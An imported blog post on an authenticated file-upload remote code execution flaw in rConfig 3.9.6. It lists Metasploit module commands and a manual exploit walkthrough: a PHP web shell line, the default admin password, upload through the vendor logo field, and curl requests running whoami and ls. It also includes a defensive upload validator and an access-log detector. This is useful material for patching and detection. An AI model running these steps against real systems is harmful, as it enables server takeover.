rConfig is a network configuration management tool; version 3.9.6 and earlier are affected by multiple vulnerabilities. One of them is an arbitrary file upload issue that leads to remote code execution (RCE) for authenticated users.
The vulnerability is in the /lib/crud/vendors.crud.php file: the vendor logo upload does not validate the contents of uploaded files, so an authenticated user can upload arbitrary PHP code. Once uploaded, the attacker triggers execution of that code by requesting the file under the /images/vendor path.
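The missing check described above is content validation on the logo upload. The following is an added illustration, not rConfig's code, of what a server-side validator for the vendor logo would enforce: an extension allowlist, a file-signature check that must agree with the extension, a size limit, a refusal of anything carrying a PHP open tag, and a server-chosen storage name so the client never controls the path or extension under /images/vendor. Function names and limits are assumptions for the example.

```python
import os
import secrets

# Allowed logo types and the leading bytes (file signature) each must start with.
# Constructed for this example; rConfig 3.9.6 performs no such content check.
ALLOWED_MAGIC = {
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".gif": (b"GIF87a", b"GIF89a"),
}
MAX_LOGO_BYTES = 512 * 1024  # assumed limit for a vendor logo


def validate_vendor_logo(filename, data):
    """Return (ok, reason) for an uploaded logo.

    Rejects anything that is not a small, well-formed image whose signature
    matches its extension. The extension alone is never trusted.
    """
    if not data or len(data) > MAX_LOGO_BYTES:
        return False, "empty or oversized upload"
    ext = os.path.splitext(os.path.basename(filename))[1].lower()
    if ext not in ALLOWED_MAGIC:
        return False, f"extension {ext!r} not in allowlist"
    if not any(data.startswith(magic) for magic in ALLOWED_MAGIC[ext]):
        return False, "file signature does not match extension"
    if b"<?php" in data or b"<?=" in data:
        # Defence in depth: a valid image header can still be followed by a
        # PHP payload (an image/PHP polyglot), so refuse any PHP open tag.
        return False, "PHP open tag found in image data"
    return True, "ok"


def safe_store_name(filename):
    """Server-chosen storage name: random token plus the validated extension.

    Call only after validate_vendor_logo() returned ok, so the extension is
    known to be in the allowlist and the client cannot pick the final path.
    """
    ext = os.path.splitext(os.path.basename(filename))[1].lower()
    return f"{secrets.token_hex(16)}{ext}"
```

Pair this with web server configuration that never hands files under /images/vendor to the PHP interpreter; the validator limits what gets stored, the server configuration limits what can run even if a bad file slips through.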
Another vulnerability in rConfig 3.9.6 is a local file inclusion issue, tracked as CVE-2021-29006.
Metasploit exploit:
msf > use exploit/linux/http/rconfig_vendors_auth_file_upload_rce
Set the necessary options:
msf exploit(rconfig_vendors_auth_file_upload_rce) > show options
msf exploit(rconfig_vendors_auth_file_upload_rce) > set RHOST
msf exploit(rconfig_vendors_auth_file_upload_rce) > set USERNAME
msf exploit(rconfig_vendors_auth_file_upload_rce) > set PASSWORD
Execute the exploit:
msf exploit(rconfig_vendors_auth_file_upload_rce) > exploit
Manual exploit:
Step 1: Prepare the Malicious PHP File
system($_GET['cmd']);?>
Step 2: Authenticate to the rConfig Web Interface
Default password: admin
Step 3: Upload the Malicious PHP File
Once logged in, navigate to the Vendors section (https://target_ip/vendors.php) and click Add Vendor.
In the Add Vendor form, fill in the required fields, and in the Vendor Logo field, select the shell.php file you created earlier.
Submit the form to upload the file.
Step 4: Determine the File Path
The uploaded file will be stored in the /images/vendor directory. You need to determine the exact file path.
You can do this by inspecting the HTML source code of the Vendors page or by using a tool like Burp Suite to intercept the HTTP requests.
Look for the request that uploads the file and check the filename parameter. The file path will be in the format /images/vendor/<filename>.
Step 5: Execute the Malicious PHP File
Now that you have the file path, you can execute the malicious PHP file by sending a GET request to the file’s URL.
For example, if the file path is /images/vendor/shell.php, you can execute it by navigating to http://target_ip/images/vendor/shell.php in your web browser.
You can also use a tool like curl to execute the file:
curl http://target_ip/images/vendor/shell.php?cmd=whoami
This will execute the whoami command on the target system and display the output.
Step 6: Interact with the Web Shell
Once you’ve executed the malicious PHP file, you can interact with the web shell by sending GET requests with the cmd parameter.
curl http://target_ip/images/vendor/shell.php?cmd=ls
To mitigate these risks, update to a version of rConfig later than 3.9.6 or apply security patches if available.
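The requests described in Steps 5 and 6 leave a distinctive trail: GET requests for a .php file under /images/vendor, typically with a cmd query parameter, where a logo directory should only ever serve images. The following is an added detection example, not part of the original post, that scans web server access logs in combined log format for exactly that pattern and separates successful executions (HTTP 200) from blocked attempts. The log lines embedded below are constructed sample data; the field layout is the standard Apache/nginx combined format.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Combined log format: ip ident user [time] "METHOD target proto" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

VENDOR_DIR = "/images/vendor/"  # upload location named in the advisory text

# Constructed sample access log: normal use of the Vendors page, a legitimate
# logo fetch, then two web shell calls and one blocked PHP request.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Feb/2025:10:01:02 +0000] "GET /vendors.php HTTP/1.1" 200 5123
10.0.0.5 - - [12/Feb/2025:10:01:09 +0000] "GET /images/vendor/cisco.png HTTP/1.1" 200 2048
10.0.0.9 - - [12/Feb/2025:10:02:31 +0000] "GET /images/vendor/shell.php?cmd=whoami HTTP/1.1" 200 17
10.0.0.9 - - [12/Feb/2025:10:02:40 +0000] "GET /images/vendor/shell.php?cmd=ls HTTP/1.1" 200 312
10.0.0.9 - - [12/Feb/2025:10:03:01 +0000] "GET /images/vendor/old.php HTTP/1.1" 403 199
"""


def find_vendor_php_requests(log_text):
    """Return one alert dict per request for a .php file under /images/vendor.

    'executed' is True when the server answered 200, i.e. the PHP file was
    served by the interpreter rather than blocked; 'cmd' carries the decoded
    cmd query value when one was supplied.
    """
    alerts = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        parts = urlsplit(m.group("target"))
        path = parts.path.lower()
        if not (path.startswith(VENDOR_DIR) and path.endswith(".php")):
            continue
        query = parse_qs(parts.query)
        alerts.append({
            "ip": m.group("ip"),
            "time": m.group("ts"),
            "path": parts.path,
            "cmd": query.get("cmd", [None])[0],
            "status": int(m.group("status")),
            "executed": m.group("status") == "200",
        })
    return alerts


if __name__ == "__main__":
    for alert in find_vendor_php_requests(SAMPLE_LOG):
        level = "HIGH" if alert["executed"] else "blocked"
        print(f"[{level}] {alert['time']} {alert['ip']} {alert['path']} cmd={alert['cmd']}")
```

Any hit here is worth a look regardless of status code, because a PHP file should not exist under the logo directory at all; a 200 means the interpreter ran it and the host should be treated as compromised, while a 403 or 404 still shows someone probing for the upload.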
This post was originally published on Medium. Imported 2025-02-12.